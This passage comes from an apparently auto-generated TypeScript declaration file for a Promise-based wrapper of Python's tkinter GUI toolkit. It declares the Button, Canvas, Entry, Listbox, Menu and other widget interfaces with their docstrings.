*/\n\t\tgrid_configure(cnf?): Promise<any>\n\t\tgrid_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget.\n\t\t */\n\t\tgrid_forget(): Promise<any>\n\t\tgrid_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget but remember the grid options.\n\t\t */\n\t\tgrid_remove(): Promise<any>\n\t\tgrid_remove$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the options\n\t\t * for positioning this widget in a grid.\n\t\t */\n\t\tgrid_info(): Promise<any>\n\t\tgrid_info$($: {}): Promise<any>\n\t\tlocation\n\t}\n\n\t/**\n\t * Internal class.\n\t */\n\n\t/**\n\t * Construct a widget with the parent widget MASTER, a name WIDGETNAME\n\t * and appropriate options.\n\t */\n\tfunction BaseWidget(master, widgetName, cnf?, kw?, extra?): Promise<IBaseWidget>\n\tfunction BaseWidget$({ master, widgetName, cnf, kw, extra }: { master, widgetName, cnf?, kw?, extra?}): Promise<IBaseWidget>\n\tinterface IBaseWidget extends IMisc {\n\n\t\t/**\n\t\t * Destroy this and all descendants widgets.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Internal class.\n\t * \n\t * Base class for a widget which can be positioned with the geometry managers\n\t * Pack, Place or Grid.\n\t */\n\tinterface IWidget extends IBaseWidget, IPack, IPlace, IGrid {\n\t}\n\n\t/**\n\t * Toplevel widget, e.g. for dialogs.\n\t */\n\n\t/**\n\t * Construct a toplevel widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, class,\n\t * colormap, container, cursor, height, highlightbackground,\n\t * highlightcolor, highlightthickness, menu, relief, screen, takefocus,\n\t * use, visual, width.\n\t */\n\tfunction Toplevel(master?, cnf?): Promise<IToplevel>\n\tfunction Toplevel$({ master, cnf }: { master?, cnf?}): Promise<IToplevel>\n\tinterface IToplevel extends IBaseWidget, IWm {\n\t}\n\n\t/**\n\t * Button widget.\n\t */\n\n\t/**\n\t * Construct a button widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, activeforeground, anchor,\n\t * background, bitmap, borderwidth, cursor,\n\t * disabledforeground, font, foreground\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, image, justify,\n\t * padx, pady, relief, repeatdelay,\n\t * repeatinterval, takefocus, text,\n\t * textvariable, underline, wraplength\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * command, compound, default, height,\n\t * overrelief, state, width\n\t * \n\t */\n\tfunction Button(master?, cnf?): Promise<IButton>\n\tfunction Button$({ master, cnf }: { master?, cnf?}): Promise<IButton>\n\tinterface IButton extends IWidget {\n\n\t\t/**\n\t\t * Flash the button.\n\t\t * \n\t\t * This is accomplished by redisplaying\n\t\t * the button several times, alternating between active and\n\t\t * normal colors. At the end of the flash the button is left\n\t\t * in the same normal/active state as when the command was\n\t\t * invoked. This command is ignored if the button's state is\n\t\t * disabled.\n\t\t * \n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Invoke the command associated with the button.\n\t\t * \n\t\t * The return value is the return value from the command,\n\t\t * or an empty string if there is no command associated with\n\t\t * the button. This command is ignored if the button's state\n\t\t * is disabled.\n\t\t * \n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Canvas widget to display graphical elements like lines or text.\n\t */\n\n\t/**\n\t * Construct a canvas widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, closeenough,\n\t * confine, cursor, height, highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground, insertborderwidth,\n\t * insertofftime, insertontime, insertwidth, offset, relief,\n\t * scrollregion, selectbackground, selectborderwidth, selectforeground,\n\t * state, takefocus, width, xscrollcommand, xscrollincrement,\n\t * yscrollcommand, yscrollincrement.\n\t */\n\tfunction Canvas(master?, cnf?): Promise<ICanvas>\n\tfunction Canvas$({ master, cnf }: { master?, cnf?}): Promise<ICanvas>\n\tinterface ICanvas extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\taddtag(): Promise<any>\n\t\taddtag$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items above TAGORID.\n\t\t */\n\t\taddtag_above(newtag, tagOrId): Promise<any>\n\t\taddtag_above$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items.\n\t\t */\n\t\taddtag_all(newtag): Promise<any>\n\t\taddtag_all$({ newtag }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items below TAGORID.\n\t\t */\n\t\taddtag_below(newtag, tagOrId): Promise<any>\n\t\taddtag_below$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to item which is closest to pixel at X, Y.\n\t\t * If several match take the top-most.\n\t\t * All items closer than HALO are considered overlapping (all are\n\t\t * closests). If START is specified the next below this tag is taken.\n\t\t */\n\t\taddtag_closest(newtag, x, y, halo?, start?): Promise<any>\n\t\taddtag_closest$({ newtag, x, y, halo, start }: { newtag, x, y, halo?, start?}): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items in the rectangle defined\n\t\t * by X1,Y1,X2,Y2.\n\t\t */\n\t\taddtag_enclosed(newtag, x1, y1, x2, y2): Promise<any>\n\t\taddtag_enclosed$({ newtag, x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items which overlap the rectangle\n\t\t * defined by X1,Y1,X2,Y2.\n\t\t */\n\t\taddtag_overlapping(newtag, x1, y1, x2, y2): Promise<any>\n\t\taddtag_overlapping$({ newtag, x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Add tag NEWTAG to all items with TAGORID.\n\t\t */\n\t\taddtag_withtag(newtag, tagOrId): Promise<any>\n\t\taddtag_withtag$({ newtag, tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a rectangle\n\t\t * which encloses all items with tags specified as arguments.\n\t\t */\n\t\tbbox(): Promise<any>\n\t\tbbox$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all items with TAGORID for event SEQUENCE the\n\t\t * function identified with FUNCID.\n\t\t */\n\t\ttag_unbind(tagOrId, sequence, funcid?): Promise<any>\n\t\ttag_unbind$({ tagOrId, sequence, funcid }: { tagOrId, sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all items with TAGORID at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or whether it will\n\t\t * replace the previous function. See bind for the return value.\n\t\t */\n\t\ttag_bind(tagOrId, sequence?, func?, add?): Promise<any>\n\t\ttag_bind$({ tagOrId, sequence, func, add }: { tagOrId, sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Return the canvas x coordinate of pixel position SCREENX rounded\n\t\t * to nearest multiple of GRIDSPACING units.\n\t\t */\n\t\tcanvasx(screenx, gridspacing?): Promise<any>\n\t\tcanvasx$({ screenx, gridspacing }: { screenx, gridspacing?}): Promise<any>\n\n\t\t/**\n\t\t * Return the canvas y coordinate of pixel position SCREENY rounded\n\t\t * to nearest multiple of GRIDSPACING units.\n\t\t */\n\t\tcanvasy(screeny, gridspacing?): Promise<any>\n\t\tcanvasy$({ screeny, gridspacing }: { screeny, gridspacing?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of coordinates for the item given in ARGS.\n\t\t */\n\t\tcoords(): Promise<any>\n\t\tcoords$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create arc shaped region with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_arc(): Promise<any>\n\t\tcreate_arc$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create bitmap with coordinates x1,y1.\n\t\t */\n\t\tcreate_bitmap(): Promise<any>\n\t\tcreate_bitmap$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create image item with coordinates x1,y1.\n\t\t */\n\t\tcreate_image(): Promise<any>\n\t\tcreate_image$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create line with coordinates x1,y1,...,xn,yn.\n\t\t */\n\t\tcreate_line(): Promise<any>\n\t\tcreate_line$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create oval with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_oval(): Promise<any>\n\t\tcreate_oval$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create polygon with coordinates x1,y1,...,xn,yn.\n\t\t */\n\t\tcreate_polygon(): Promise<any>\n\t\tcreate_polygon$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create rectangle with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_rectangle(): Promise<any>\n\t\tcreate_rectangle$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create text with coordinates x1,y1.\n\t\t */\n\t\tcreate_text(): Promise<any>\n\t\tcreate_text$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Create window with coordinates x1,y1,x2,y2.\n\t\t */\n\t\tcreate_window(): Promise<any>\n\t\tcreate_window$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete characters of text items identified by tag or id in ARGS (possibly\n\t\t * several times) from FIRST to LAST character (including).\n\t\t */\n\t\tdchars(): Promise<any>\n\t\tdchars$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete items identified by all tag or ids contained in ARGS.\n\t\t */\n\t\tdelete(): Promise<any>\n\t\tdelete$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete tag or id given as last arguments in ARGS from items\n\t\t * identified by first argument in ARGS.\n\t\t */\n\t\tdtag(): Promise<any>\n\t\tdtag$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tfind(): Promise<any>\n\t\tfind$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return items above TAGORID.\n\t\t */\n\t\tfind_above(tagOrId): Promise<any>\n\t\tfind_above$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return all items.\n\t\t */\n\t\tfind_all(): Promise<any>\n\t\tfind_all$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return all items below TAGORID.\n\t\t */\n\t\tfind_below(tagOrId): Promise<any>\n\t\tfind_below$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Return item which is closest to pixel at X, Y.\n\t\t * If several match take the top-most.\n\t\t * All items closer than HALO are considered overlapping (all are\n\t\t * closest). If START is specified the next below this tag is taken.\n\t\t */\n\t\tfind_closest(x, y, halo?, start?): Promise<any>\n\t\tfind_closest$({ x, y, halo, start }: { x, y, halo?, start?}): Promise<any>\n\n\t\t/**\n\t\t * Return all items in rectangle defined\n\t\t * by X1,Y1,X2,Y2.\n\t\t */\n\t\tfind_enclosed(x1, y1, x2, y2): Promise<any>\n\t\tfind_enclosed$({ x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Return all items which overlap the rectangle\n\t\t * defined by X1,Y1,X2,Y2.\n\t\t */\n\t\tfind_overlapping(x1, y1, x2, y2): Promise<any>\n\t\tfind_overlapping$({ x1, y1, x2, y2 }): Promise<any>\n\n\t\t/**\n\t\t * Return all items with TAGORID.\n\t\t */\n\t\tfind_withtag(tagOrId): Promise<any>\n\t\tfind_withtag$({ tagOrId }): Promise<any>\n\n\t\t/**\n\t\t * Set focus to the first item specified in ARGS.\n\t\t */\n\t\tfocus(): Promise<any>\n\t\tfocus$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return tags associated with the first item specified in ARGS.\n\t\t */\n\t\tgettags(): Promise<any>\n\t\tgettags$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set cursor at position POS in the item identified by TAGORID.\n\t\t * In ARGS TAGORID must be first.\n\t\t */\n\t\ticursor(): Promise<any>\n\t\ticursor$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return position of cursor as integer in item specified in ARGS.\n\t\t */\n\t\tindex(): Promise<any>\n\t\tindex$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Insert TEXT in item TAGORID at position POS. ARGS must\n\t\t * be TAGORID POS TEXT.\n\t\t */\n\t\tinsert(): Promise<any>\n\t\tinsert$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for an OPTION for item TAGORID.\n\t\t */\n\t\titemcget(tagOrId, option): Promise<any>\n\t\titemcget$({ tagOrId, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of an item TAGORID.\n\t\t * \n\t\t * The values for resources are specified as keyword\n\t\t * arguments. To get an overview about\n\t\t * the allowed keyword arguments call the method without arguments.\n\t\t * \n\t\t */\n\t\titemconfigure(tagOrId, cnf?): Promise<any>\n\t\titemconfigure$({ tagOrId, cnf }: { tagOrId, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Lower an item TAGORID given in ARGS\n\t\t * (optional below another item).\n\t\t */\n\t\ttag_lower(): Promise<any>\n\t\ttag_lower$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Move an item TAGORID given in ARGS.\n\t\t */\n\t\tmove(): Promise<any>\n\t\tmove$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Move the items given by TAGORID in the canvas coordinate\n\t\t * space so that the first coordinate pair of the bottommost\n\t\t * item with tag TAGORID is located at position (X,Y).\n\t\t * X and Y may be the empty string, in which case the\n\t\t * corresponding coordinate will be unchanged. All items matching\n\t\t * TAGORID remain in the same positions relative to each other.\n\t\t */\n\t\tmoveto(tagOrId, x?, y?): Promise<any>\n\t\tmoveto$({ tagOrId, x, y }: { tagOrId, x?, y?}): Promise<any>\n\n\t\t/**\n\t\t * Print the contents of the canvas to a postscript\n\t\t * file. Valid options: colormap, colormode, file, fontmap,\n\t\t * height, pageanchor, pageheight, pagewidth, pagex, pagey,\n\t\t * rotate, width, x, y.\n\t\t */\n\t\tpostscript(cnf?): Promise<any>\n\t\tpostscript$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Raise an item TAGORID given in ARGS\n\t\t * (optional above another item).\n\t\t */\n\t\ttag_raise(): Promise<any>\n\t\ttag_raise$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Scale item TAGORID with XORIGIN, YORIGIN, XSCALE, YSCALE.\n\t\t */\n\t\tscale(): Promise<any>\n\t\tscale$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the canvas to GAIN times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y, gain?): Promise<any>\n\t\tscan_dragto$({ x, y, gain }: { x, y, gain?}): Promise<any>\n\n\t\t/**\n\t\t * Adjust the end of the selection near the cursor of an item TAGORID to index.\n\t\t */\n\t\tselect_adjust(tagOrId, index): Promise<any>\n\t\tselect_adjust$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection if it is in this widget.\n\t\t */\n\t\tselect_clear(): Promise<any>\n\t\tselect_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection in item TAGORID to INDEX.\n\t\t */\n\t\tselect_from(tagOrId, index): Promise<any>\n\t\tselect_from$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Return the item which has the selection.\n\t\t */\n\t\tselect_item(): Promise<any>\n\t\tselect_item$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection in item TAGORID to INDEX.\n\t\t */\n\t\tselect_to(tagOrId, index): Promise<any>\n\t\tselect_to$({ tagOrId, index }): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the item TAGORID.\n\t\t */\n\t\ttype(tagOrId): Promise<any>\n\t\ttype$({ tagOrId }): Promise<any>\n\t\titemconfig\n\t}\n\n\t/**\n\t * Checkbutton widget which is either in on- or off-state.\n\t */\n\n\t/**\n\t * Construct a checkbutton widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeforeground, anchor,\n\t * background, bd, bg, bitmap, borderwidth, command, cursor,\n\t * disabledforeground, fg, font, foreground, height,\n\t * highlightbackground, highlightcolor, highlightthickness, image,\n\t * indicatoron, justify, offvalue, onvalue, padx, pady, relief,\n\t * selectcolor, selectimage, state, takefocus, text, textvariable,\n\t * underline, variable, width, wraplength.\n\t */\n\tfunction Checkbutton(master?, cnf?): Promise<ICheckbutton>\n\tfunction Checkbutton$({ master, cnf }: { master?, cnf?}): Promise<ICheckbutton>\n\tinterface ICheckbutton extends IWidget {\n\n\t\t/**\n\t\t * Put the button in off-state.\n\t\t */\n\t\tdeselect(): Promise<any>\n\t\tdeselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Flash the button.\n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button and invoke a command if given as resource.\n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Put the button in on-state.\n\t\t */\n\t\tselect(): Promise<any>\n\t\tselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button.\n\t\t */\n\t\ttoggle(): Promise<any>\n\t\ttoggle$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Entry widget which allows displaying simple text.\n\t */\n\n\t/**\n\t * Construct an entry widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, cursor,\n\t * exportselection, fg, font, foreground, highlightbackground,\n\t * highlightcolor, highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime, insertontime, insertwidth,\n\t * invalidcommand, invcmd, justify, relief, selectbackground,\n\t * selectborderwidth, selectforeground, show, state, takefocus,\n\t * textvariable, validate, validatecommand, vcmd, width,\n\t * xscrollcommand.\n\t */\n\tfunction Entry(master?, cnf?): Promise<IEntry>\n\tfunction Entry$({ master, cnf }: { master?, cnf?}): Promise<IEntry>\n\tinterface IEntry extends IWidget, IXView {\n\n\t\t/**\n\t\t * Delete text from FIRST to LAST (not included).\n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return the text.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Insert cursor at INDEX.\n\t\t */\n\t\ticursor(index): Promise<any>\n\t\ticursor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return position of cursor.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert STRING at INDEX.\n\t\t */\n\t\tinsert(index, string): Promise<any>\n\t\tinsert$({ index, string }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x): Promise<any>\n\t\tscan_mark$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the canvas to 10 times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x): Promise<any>\n\t\tscan_dragto$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the end of the selection near the cursor to INDEX.\n\t\t */\n\t\tselection_adjust(index): Promise<any>\n\t\tselection_adjust$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection if it is in this widget.\n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection to INDEX.\n\t\t */\n\t\tselection_from(index): Promise<any>\n\t\tselection_from$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return True if there are characters selected in the entry, False\n\t\t * otherwise.\n\t\t */\n\t\tselection_present(): Promise<any>\n\t\tselection_present$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from START to END (not included).\n\t\t */\n\t\tselection_range(start, end): Promise<any>\n\t\tselection_range$({ start, end }): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection to INDEX.\n\t\t */\n\t\tselection_to(index): Promise<any>\n\t\tselection_to$({ index }): Promise<any>\n\t\tselect_present\n\t\tselect_range\n\t}\n\n\t/**\n\t * Frame widget which may contain other widgets and can have a 3D border.\n\t */\n\n\t/**\n\t * Construct a frame widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, class,\n\t * colormap, container, cursor, height, highlightbackground,\n\t * highlightcolor, highlightthickness, relief, takefocus, visual, width.\n\t */\n\tfunction Frame(master?, cnf?): Promise<IFrame>\n\tfunction Frame$({ master, cnf }: { master?, cnf?}): Promise<IFrame>\n\tinterface IFrame extends IWidget {\n\t}\n\n\t/**\n\t * Label widget which can display text and bitmaps.\n\t */\n\n\t/**\n\t * Construct a label widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, activeforeground, anchor,\n\t * background, bitmap, borderwidth, cursor,\n\t * disabledforeground, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, image, justify,\n\t * padx, pady, relief, takefocus, text,\n\t * textvariable, underline, wraplength\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * height, state, width\n\t * \n\t * \n\t */\n\tfunction Label(master?, cnf?): Promise<ILabel>\n\tfunction Label$({ master, cnf }: { master?, cnf?}): Promise<ILabel>\n\tinterface ILabel extends IWidget {\n\t}\n\n\t/**\n\t * Listbox widget which can display a list of strings.\n\t */\n\n\t/**\n\t * Construct a listbox widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, cursor,\n\t * exportselection, fg, font, foreground, height, highlightbackground,\n\t * highlightcolor, highlightthickness, relief, selectbackground,\n\t * selectborderwidth, selectforeground, selectmode, setgrid, takefocus,\n\t * width, xscrollcommand, yscrollcommand, listvariable.\n\t */\n\tfunction Listbox(master?, cnf?): Promise<IListbox>\n\tfunction Listbox$({ master, cnf }: { master?, cnf?}): Promise<IListbox>\n\tinterface IListbox extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Activate item identified by INDEX.\n\t\t */\n\t\tactivate(index): Promise<any>\n\t\tactivate$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a rectangle\n\t\t * which encloses the item identified by the given index.\n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the indices of currently selected item.\n\t\t */\n\t\tcurselection(): Promise<any>\n\t\tcurselection$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete items from FIRST to LAST (included).\n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Get list of items from FIRST to LAST (included).\n\t\t */\n\t\tget(first, last?): Promise<any>\n\t\tget$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return index of item identified with INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert ELEMENTS at INDEX.\n\t\t */\n\t\tinsert(index): Promise<any>\n\t\tinsert$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Get index of item which is nearest to y coordinate Y.\n\t\t */\n\t\tnearest(y): Promise<any>\n\t\tnearest$({ y }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the listbox to 10 times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y): Promise<any>\n\t\tscan_dragto$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Scroll such that INDEX is visible.\n\t\t */\n\t\tsee(index): Promise<any>\n\t\tsee$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end oft the selection to INDEX.\n\t\t */\n\t\tselection_anchor(index): Promise<any>\n\t\tselection_anchor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection from FIRST to LAST (included).\n\t\t */\n\t\tselection_clear(first, last?): Promise<any>\n\t\tselection_clear$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if INDEX is part of the selection.\n\t\t */\n\t\tselection_includes(index): Promise<any>\n\t\tselection_includes$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from FIRST to LAST (included) without\n\t\t * changing the currently selected elements.\n\t\t */\n\t\tselection_set(first, last?): Promise<any>\n\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of elements in the listbox.\n\t\t */\n\t\tsize(): Promise<any>\n\t\tsize$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for an ITEM and an OPTION.\n\t\t */\n\t\titemcget(index, option): Promise<any>\n\t\titemcget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of an ITEM.\n\t\t * \n\t\t * The values for resources are specified as keyword arguments.\n\t\t * To get an overview about the allowed keyword arguments\n\t\t * call the method without arguments.\n\t\t * Valid resource names: background, bg, foreground, fg,\n\t\t * selectbackground, selectforeground.\n\t\t */\n\t\titemconfigure(index, cnf?): Promise<any>\n\t\titemconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\t\tselect_anchor\n\t\tselect_includes\n\t\tselect_set\n\t}\n\n\t/**\n\t * Menu widget which allows displaying menu bars, pull-down menus and pop-up menus.\n\t */\n\n\t/**\n\t * Construct menu widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeborderwidth,\n\t * activeforeground, background, bd, bg, borderwidth, cursor,\n\t * disabledforeground, fg, font, foreground, postcommand, relief,\n\t * selectcolor, takefocus, tearoff, tearoffcommand, title, type.\n\t */\n\tfunction Menu(master?, cnf?): Promise<IMenu>\n\tfunction Menu$({ master, cnf }: { master?, cnf?}): Promise<IMenu>\n\tinterface IMenu extends IWidget {\n\n\t\t/**\n\t\t * Post the menu at position X,Y with entry ENTRY.\n\t\t */\n\t\ttk_popup(x, y, entry?): Promise<any>\n\t\ttk_popup$({ x, y, entry }: { x, y, entry?}): Promise<any>\n\n\t\t/**\n\t\t * Activate entry at INDEX.\n\t\t */\n\t\tactivate(index): Promise<any>\n\t\tactivate$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tadd(itemType, cnf?): Promise<any>\n\t\tadd$({ itemType, cnf }: { itemType, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add hierarchical menu item.\n\t\t */\n\t\tadd_cascade(cnf?): Promise<any>\n\t\tadd_cascade$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add checkbutton menu item.\n\t\t */\n\t\tadd_checkbutton(cnf?): Promise<any>\n\t\tadd_checkbutton$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add command menu item.\n\t\t */\n\t\tadd_command(cnf?): Promise<any>\n\t\tadd_command$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Addd radio menu item.\n\t\t */\n\t\tadd_radiobutton(cnf?): Promise<any>\n\t\tadd_radiobutton$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add separator.\n\t\t */\n\t\tadd_separator(cnf?): Promise<any>\n\t\tadd_separator$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tinsert(index, itemType, cnf?): Promise<any>\n\t\tinsert$({ index, itemType, cnf }: { index, itemType, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add hierarchical menu item at INDEX.\n\t\t */\n\t\tinsert_cascade(index, cnf?): Promise<any>\n\t\tinsert_cascade$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add checkbutton menu item at INDEX.\n\t\t */\n\t\tinsert_checkbutton(index, cnf?): Promise<any>\n\t\tinsert_checkbutton$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add command menu item at INDEX.\n\t\t */\n\t\tinsert_command(index, cnf?): Promise<any>\n\t\tinsert_command$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Addd radio menu item at INDEX.\n\t\t */\n\t\tinsert_radiobutton(index, cnf?): Promise<any>\n\t\tinsert_radiobutton$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add separator at INDEX.\n\t\t */\n\t\tinsert_separator(index, cnf?): Promise<any>\n\t\tinsert_separator$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Delete menu items between INDEX1 and INDEX2 (included).\n\t\t */\n\t\tdelete(index1, index2?): Promise<any>\n\t\tdelete$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value of a menu item for OPTION at INDEX.\n\t\t */\n\t\tentrycget(index, option): Promise<any>\n\t\tentrycget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure a menu item at INDEX.\n\t\t */\n\t\tentryconfigure(index, cnf?): Promise<any>\n\t\tentryconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return the index of a menu item 